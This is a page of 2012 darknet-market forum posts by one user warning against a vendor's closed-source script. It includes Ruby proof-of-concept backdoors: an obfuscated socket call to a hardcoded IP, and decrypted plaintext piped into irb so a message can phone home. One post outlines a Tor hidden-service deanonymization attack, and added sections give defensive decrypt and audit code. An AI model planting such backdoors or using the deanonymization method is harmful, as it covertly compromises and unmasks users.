Show Posts



Messages - kmfkewm

Pages: 1 ... 143 144 [145] 146 147 ... 249
2161
And how does this relate to the person being accused.....

it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize that | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.

2162
it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it ;). The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.

if decrypted_message.include?("gpg-privacy-toolkit")
  # [105, 114, 98].pack("c*") == "irb": the whole plaintext is piped into a Ruby interpreter
  `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
end

checks the plaintext for the string "gpg-privacy-toolkit" and if it finds it then the entire plaintext is launched as a ruby script.


edit: here I improved it a little bit, now it actually outputs the decrypted message but if it has the 'magic' string in it then it sends packets to 11.11.11.11:80 (around Tor of course, unless you have taken configuration measures around this, like transparent proxy, firewall rules to drop traffic, isolated it somehow, etc etc).

Quote
if decrypted_message.include?("gpg-privacy-toolkit")
  # [105, 114, 98].pack("c*") == "irb": the plaintext is executed as Ruby
  puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
  puts `echo "#{decrypted_message}"`
end

The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to 

| #{[105, 114, 98].pack("c*")}


2163
try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Quote
#opens the file with your GPG message in it
file = File.open("test", "r")
message = ""

#reads the file line by line and adds each line to the string variable message
while line = file.gets
  message << line
end
file.close

#decrypts your message and stores the plaintext as decrypted_message
#(auditor's note: interpolating the file into a shell command line is itself a
#shell injection; the file never has to contain valid PGP armor to run commands)
decrypted_message = `echo "#{message}" | gpg -d`

#if the message is encrypted with the gpg-privacy toolkit we need to
#issue a special command or else it will fail because of the way
#that program encodes the messages. If a normal GPG client
#was used to encrypt the message, we don't need to do any
#special formatting though.
#
#(auditor's note: the "special command" is [105, 114, 98].pack("c*") == "irb",
#so the entire plaintext is piped into a Ruby interpreter and executed)

if decrypted_message.include?("gpg-privacy-toolkit")
  puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
  puts `echo "#{decrypted_message}"`
end

let's see now...how about this as a message to encrypt to the unsuspecting vendor

Quote

#gpg-privacy-toolkit
#(TCPSocket, not TCPServer: the victim has to connect out to 11.11.11.11:80, which a listening socket never does)
require 'socket' ; sucks_to_be_you = TCPSocket.open('11.11.11.11', 80) ; sucks_to_be_you.send('deanonymized', 0)

the ciphertext looks like this

Quote
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.4.11 (GNU/Linux)

hQIMA7GSQgzgdfsTAQ//SP27JA3aDgZh/atdSWeVAWekkUjQPuCuhwnZjxi5vFvG
E0N1SkQ/uAwgcGVEX4QWluYDudbI2SP88INsC1rL9E+jSASwjxr1dnSZBbXElj6d
y/SBf1an0fBYw1thd4EecO4iqqjgVm+YFND2qxoFvtFd5TAH/tC3qBNgp0Q3meDC
iXuvlZVOdmRDT5t4BM+Ukur4pdLzzzOMdeovp7augZAoj3VT9vlWH05PknPW0DWq
4efDGUeVlkxY//Es3R5LmkZ6XoSFOvPzTEaW5a9OC5ZyELL1+OrL61xKQR0l+o7s
4VkGPrhBAwec41+tuMZ9cz6NhGlyQc8950Pv99J6dXMgxP4iEe2h2CFTzk4+uPHc
QDeYQqcXI0elzzE+kF9ptuzcaF0sAP9Tx0yOmSggwGoFbj6sSQQPcARBoOg4TYvk
yVfchlIufeAfVZJsZUGKm+0fK2oI2Xvoy3HCWPUgc347esyxQrS5Mzrt9XVqm3gc
SO5dJ/ltgr3HNyrQPdQxmzOHEznaq8R+X5ImI7YdnEiVVLNYM2Br/v6tD3xXTEDY
7js+YHDSrdv1/WCtUjiiIJjKzS6y4YlAXF9E44C2XbSttj8XqwCHR59MH3x5YDrv
wy/02J6QJW4Gw39gqyO3FUkU0WaqpWGsmxE7mudvI+cH0rypxonM1nfBXar4tdbS
qgGT3ebTFWGr4oH+8nO9dv/KF95yw68MykNzeRJTI1idJjY2zgw3xQ8REU6aCM3v
LjdZq/BT2LvqSjVCLVuLHy6PbyxbKAhPSMg5W2LkK/eyE9/zVKVAmsWb7osK5XyW
HVuOHyKG4okWFvw7NgqMozzpYEAavvvhzPheQxyWfvC3NOCk+S88Shm37RfPpWNd
xAtlf2Z+4INETIptQdXBsaPAJQyFifn7lIl1
=6RTM
-----END PGP MESSAGE-----


hopefully nobody decrypts my message!!!
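
An added example (not kmfkewm's code, and not any product discussed in this thread) of the same "read a file, decrypt it, show the plaintext" program written so that neither the ciphertext file nor the plaintext can run code: gpg is spawned from an argv array instead of a shell line built from the file, and the plaintext is only ever printed. It assumes gpg's real --batch --decrypt flags; the command is a parameter so the demo can run with a Ruby stdin passthrough on a box that has no gpg or no keys.

```ruby
# Added example (not code from the original post): the same "read a file,
# decrypt it, show the plaintext" task written so that neither the ciphertext
# file nor the plaintext can run code.
#   1. gpg is spawned from an argv array via Open3, so the file contents never
#      pass through a shell. In the original, `echo "#{message}" | gpg -d`
#      interpolates the file into a shell command line, so a "ciphertext" file
#      containing `"; some-command; "` runs some-command before gpg even starts.
#   2. The plaintext is returned and printed as data and never piped into irb
#      or eval'd, so no "magic string" in it can turn it into a script.
require "open3"
require "rbconfig"

# What the original program would hand to /bin/sh for a given file content.
# Built only so an auditor can see the injection; it is never executed here.
def shell_command_for(message)
  %(echo "#{message}" | gpg -d)
end

# Hardened decrypt. `command` is an argv array (no shell). It defaults to gpg;
# it is a parameter so the function can be exercised with any stdin->stdout
# filter on a machine that has no gpg or no keys.
def decrypt_message(ciphertext, command: %w[gpg --batch --decrypt])
  plaintext, status = Open3.capture2(*command, stdin_data: ciphertext)
  raise "decryption failed (exit #{status.exitstatus})" unless status.success?
  plaintext
end

# Display step: deliberately nothing but `puts`. Whatever the sender put in the
# message, "gpg-privacy-toolkit" included, is text on the screen and nothing else.
def show_decrypted(ciphertext, command: %w[gpg --batch --decrypt])
  plaintext = decrypt_message(ciphertext, command: command)
  puts plaintext
  plaintext
end

# Stand-in for gpg in the demo: the running Ruby interpreter echoing its stdin.
PASSTHROUGH = [RbConfig.ruby, "-e", "print STDIN.read"].freeze

if __FILE__ == $PROGRAM_NAME
  # Constructed file content: armor lines wrapped around a shell metacharacter payload.
  hostile = %(-----BEGIN PGP MESSAGE-----\n"; touch /tmp/pwned; echo "\n-----END PGP MESSAGE-----\n)
  puts "original would run under sh: #{shell_command_for(hostile)}"
  puts "hardened path just shows it:"
  show_decrypted(hostile, command: PASSTHROUGH)
end
```

The point of the parameterised command is not flexibility but auditability: the only executable thing in the program is a fixed argv, and the data path from file to screen contains no interpolation into a shell and no interpreter, so there is nothing for a "magic string" to switch on.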

2164
Quote
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.

What a crock of shit. Agorism is extremely anti-government. Agorists do not recognize the legitimacy of any government, or even of nations separated by borders. They are extremely against regulation. Even people who are anti-capitalist generally accuse capitalists of being anti-regulation, claiming that government regulations protect the people from the evil capitalists who only care about money and not the well being of the people, so I don't see where you get capitalism is pro-regulation from. The USA is not a capitalist country, if that is where you happen to live. The USA merely claims to be a capitalist country. It is really quite a fascist country, although currently the Democrat politicians masquerade as socialist to get support from the public which is largely in favor of socialism. Agorism is about as anti-regulation, anti-government, anti-fascist as you can get, although it is perfectly fine with market manipulation and monopolies and such.

Quote
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.

No most of those drugs are restricted, maybe that is what you meant to say? And it is because of fascism not capitalism. Silk Road is a great example of Agorism. The primary theory of Agorism is that private security agencies will rise up, funded by black market activity (such as drug trafficking), and will eventually become powerful enough to totally protect their customers from the state, eventually leading to the death of the state and government. That is Agorism in a nutshell, not banning drugs and regulating things lol.

Quote
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.

Most Agorists are very pro-gold and against fiat currency, although bitcoin is of course insanely popular with them as well.

2165
Quote
No, that's just your opinion.  You want me to adhere to your definition of what Silk Road should be rather than what it actually is.

No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.

Quote
I've said my product is a particular thing, which runs in a certain way and is not a threat.  You (and Pine) say otherwise.  If people agree with you or are just not interested in the product then they won't buy it.  If people don't agree with you and are interested in the product then they might buy it.

I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.

Quote
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales.  If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed.  At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.

Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.

Quote
If you really want to prove me wrong then buy SROPPy and post the code.  I'm willing to bet you don't do that.

Why would I buy something that I could make myself in about ten minutes with Ruby?

PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled 

2166

And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.


You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it, and in the code that is distributed have it (obfuscated of course, which would probably be caught in an audit) take the message that is decrypted from the ciphertext and run it as a script if the header is detected. Then you could completely hide any networking calls and have the code distributed look a lot more legit, although there would still be a switch that is looking for a special signal and of course the code that then runs whatever is decrypted as a script. Not a foolproof plan by any means, but it would possibly be easier to hide this than my original post of a ruby method that does networking while obfuscating IP address and port and obfuscated require of sockets, (although not the fact that TCP is being used). Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.

2167


Quote
I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable.

I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free. Look at Tor and then look at any VPN. Tor works because volunteers donate their resources to a collective of people who are free to use them without any pay. Although it is not strictly speaking communistic due to the fact that nobody is forced to donate resources, it strikes me as having a more communist-based ideology behind it than a paid VPN does. The fact that thousands of people volunteer their resources at little to no benefit for themselves allows Tor to be extremely good at providing low latency anonymity. I see a lot of Agorists who are actually not very fond of Tor and highly favor VPNs (probably in part due to the fact that they sell access to VPNs and are pissed off that Tor offers better anonymity than they can in addition to being free). They are also highly focused on creating pay anonymity networks where every byte you transmit comes at a cost that is paid to the node operators who relay for you. Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.

So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars. Not as much as the people making closed source proprietary encryption software make, but then again we can be more confident when we use their solution than we can be when we use the solutions from their strictly for profit competitors. Look at FileVault and VileFault for example.

Quote
Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.

We should not put the financial interests of vendors here above the security of everyone else. Vendors who purchase this code are not going to go through it with a fine-tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it, they are not going to audit it, etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.


Quote
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.

A fair enough point.

Quote
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.

It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.

2168
Security / Re: How come SR server is not busted yet?
« on: September 08, 2012, 09:29 am »
Passive or active really has nothing to do with it, it is the percentage of the network that the attacker has the ability to monitor that does. If I watch your internet traffic by eavesdropping on the packets your wireless card sends to your router I am a passive attacker, but that does not mean I can deanonymize a hidden service. The quickest way to deanonymize a hidden service is actually a mixture of active and passive attack. The active attack involves forcing the hidden service to quickly open circuit after circuit, which is currently allowed by the design of Tor. Since you can make it open as many circuits as you want, you can greatly reduce the amount of time it takes for it to create a circuit that you own one of the nodes on. Eventually the node you own will either be one of the hidden services entry guards or a middle node that is directly connected to an entry guard. Once you own the middle node and can identify the entry guard then the easiest way to deanonymize the hidden service would be to passively monitor the entry guard and send the hidden service some data until it goes through the entry guard and you can then identify the hidden service with a timing attack. It really shouldn't be very difficult for the feds to pull this off, but it is not because they are a passive attacker that they can do it....I mean like I said originally I am a passive attacker just by monitoring the packets leaving your wireless network card but that doesn't help me trace a hidden service at all.

2169


Quote
Quote
PGPPortable is a worthless piece of shit! Do NOT use this software -- it is broken!

Guru

It's not broken, I just used it like 3 days ago. Anyways, opinions are like assholes: everyone has one and they usually stink. So if not really into CPUs, try Portable, it's easy, but ultimately you decide.

512 bit keys have been broken by private individuals :P

2170
It is not impossible to hide a backdoor of sorts in a python script. Take this for example. It is not exactly a well hidden backdoor, but it might be overlooked, and a single call to it could deanonymize anyone who runs the script it is in. I admit it looks sketchy as hell and anyone who knows Ruby could figure out what is going on, but this is about as far as you get when it comes to backdoors in languages like this (whereas with C or C++ it can be done MUCH MUCH more sneakily).


# [115, 111, 99, 107, 101, 116].pack("c*") == "socket": an obfuscated require 'socket'
[[115, 111, 99, 107, 101, 116].pack("c*")].each { |gpg_helper| require gpg_helper }

def seed_randomness
  # host = [49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*") == "12.25.33.12"
  # port = [56, 48].pack("c*") == "80"
  # TCPSocket (an outbound client connection) rather than TCPServer, which would
  # try to bind a listener on 12.25.33.12 and fail on any machine that is not it
  random_numbers = TCPSocket.open([49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*"), [56, 48].pack("c*"))
  random_numbers.send("seed", 0)
end

The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.
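
An added example (not kmfkewm's code, and not any product discussed in this thread) of what "knowing the language well enough to notice" looks like as a script: a small Ruby audit pass that decodes integer-array pack("c*") literals back into the strings they build and then flags the constructs a backdoor of this shape needs (a dynamic require, a shell-out, eval-style execution, socket classes, interpreter names). The sample source it scans is constructed from the two obfuscated fragments in the posts above, as posted. The pattern table is the example's own and is deliberately narrow; pack("U*"), string concatenation, Base64 or define_method tricks would walk straight past it, so a clean report means "nothing obvious", not "safe".

```ruby
# Added example (not code from the original post): a small audit pass for the
# obfuscation tricks in the snippets above. It turns integer-array pack("c*")
# literals back into strings, then flags the constructs a backdoor of this
# shape needs. It knows only these exact patterns; a clean report means
# "nothing obvious", not "safe". Stand-alone Ruby with a constructed sample.

PACK_LITERAL = /\[\s*((?:\d+\s*,\s*)*\d+)\s*\]\s*\.pack\(\s*["'][cC]\*["']\s*\)/

# Pattern table (this example's own choice of what counts as suspicious).
SUSPECT = {
  "dynamic require"     => /\b(?:require|require_relative|load)\s+(?!["'])\S/,
  "shell-out"           => /`[^`\n]*`|%x\{|\b(?:system|exec|spawn|popen)\b/,
  "code execution"      => /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  "socket"              => /\b(?:TCPSocket|TCPServer|UDPSocket|Socket|Net::HTTP)\b/,
  "interpreter by name" => /\b(?:irb|ruby|python|perl|bash)\b/,
}.freeze

# "115, 111, 99" -> "soc": the bytes the pack("c*") call would produce.
def decode_bytes(csv)
  csv.split(",").map { |n| n.strip.to_i }.pack("C*")
end

# Every pack("c*") literal in the source, decoded, in order of appearance.
def decode_pack_literals(src)
  src.scan(PACK_LITERAL).flatten.map { |csv| decode_bytes(csv) }
end

# The source with each pack literal replaced by the string it builds, so a
# reviewer reads `require "socket"` instead of a row of numbers.
def deobfuscate(src)
  src.gsub(PACK_LITERAL) { decode_bytes(Regexp.last_match(1)).inspect }
end

# Run the pattern table over the deobfuscated source, line by line.
def audit(src)
  clean = deobfuscate(src)
  findings = []
  clean.each_line.with_index(1) do |line, no|
    SUSPECT.each do |kind, re|
      findings << { line: no, kind: kind, text: line.strip } if line.match?(re)
    end
  end
  { decoded: decode_pack_literals(src), findings: findings }
end

# Constructed sample: the two obfuscated fragments from the posts above, as posted.
SAMPLE = <<~'RUBY'
  [[115, 111, 99, 107, 101, 116].pack("c*")].each {|gpg_helper| require gpg_helper}
  def seed_randomness
    random_numbers = TCPServer.open([49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*"), [56, 48].pack("c*"))
    random_numbers.send("seed", 0)
  end
  if decrypted_message.include?("gpg-privacy-toolkit")
    puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  report = audit(SAMPLE)
  puts "decoded pack literals: #{report[:decoded].inspect}"
  report[:findings].each { |f| puts "line #{f[:line]} [#{f[:kind]}]: #{f[:text]}" }
end
```

Run against the sample it reports "socket", "12.25.33.12", "80" and "irb" as the decoded literals, then the dynamic require on line 1, the socket class on line 3, and the backtick shell-out plus the interpreter name on line 7; the deobfuscated line reads TCPServer.open("12.25.33.12", "80"), which is the form a reviewer actually wants to be looking at.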

2171
Quote
Uh-huh.  So you've got a vendor account and inspected all the code that the vendor's see?

No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me. Strictly speaking it can be much more secure to run your application than to access SR, as you cannot access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.

Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed Python and even Ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.

2172
I think that your replies make sense. I guess if people are so paranoid why not let specific members of the forum check the code out? Maybe you should give the code to kmf and he could check it out and confirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way. Just a suggestion though. To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way. It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.

First of all I do not know python, although it looks close enough to Ruby from what I have seen that I am sure I could audit such a simple program with little effort to learn it. Second of all, it would preferably be audited by more people than me, as in anyone with access to the forum ;).

2173
Quote
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.

2174
you are far better off just learning to use GPG, it is trivial

2175
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did, but wouldn't it be funny if they did and it turned out to be everything that was promised? I think it's kind of been forgotten that Louis created this out of request by another vendor... why doesn't someone just ask the vendor if it works? If they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffic mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. What kind of police work would that be? Sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? Just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, I'm inclined to believe him more than take anyone else's opinion on it. Wouldn't run the software without hearing from the vendor who requested it and used it though.

Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement cannot sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.
